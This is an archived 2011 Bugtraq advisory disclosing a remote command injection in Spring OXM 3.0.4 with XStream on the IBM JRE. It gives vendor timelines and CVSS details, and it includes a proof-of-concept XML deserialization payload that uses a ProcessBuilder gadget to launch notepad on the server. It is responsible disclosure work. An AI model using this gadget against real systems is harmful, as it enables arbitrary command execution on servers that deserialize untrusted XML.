| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <201106301513.p5UFDUqf014640@sf01web1.securityfocus.com>
Date: Thu, 30 Jun 2011 15:13:30 GMT
From: pierre.ernst@...ibm.com
To: bugtraq@...urityfocus.com
Subject: Spring Source OXM Remote OS Command Injection when XStream and
IBM JRE are used
Reference: http://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/oxm.html#d0e26722
Product: Spring Source OXM (Object/XML Mapping)
Vendor: VMware
Vulnerable Version: 3.0.4 only when XStream and IBM JRE are used
Status: Fixed
Vendor Notification: 12 October 2010
Vendor Fix: 20 October 2010
Vulnerability Type: Remote OS Command Injection (CAPEC-88)
Credit: Pierre Ernst, IBM Canada, Business Analytics
CVSS: 7.6
AccessVector: Network
AccessComplexity: High
Authentication: None
Confidentiality Impact: Complete
Integrity Impact: Complete
Availability Impact: Complete
Details:
Consider a service accepting XML input to be unmarshalled as an instance of the Bicycle class.
This is an example of legitimate input:
<bicycle>
<name>unicycle</name>
<id>123</id>
<nbrWheels>1</nbrWheels>
<nbrRiders>1</nbrRiders>
</bicycle>
This malicious input will execute the notepad application on the server and open the C:\Windows\win.ini file
<bicycle class="java.util.TreeSet">
<no-comparator />
<object />
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>notepad.exe</string>
<string>c:\windows\win.ini</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</bicycle>
Powered by blists - more mailing lists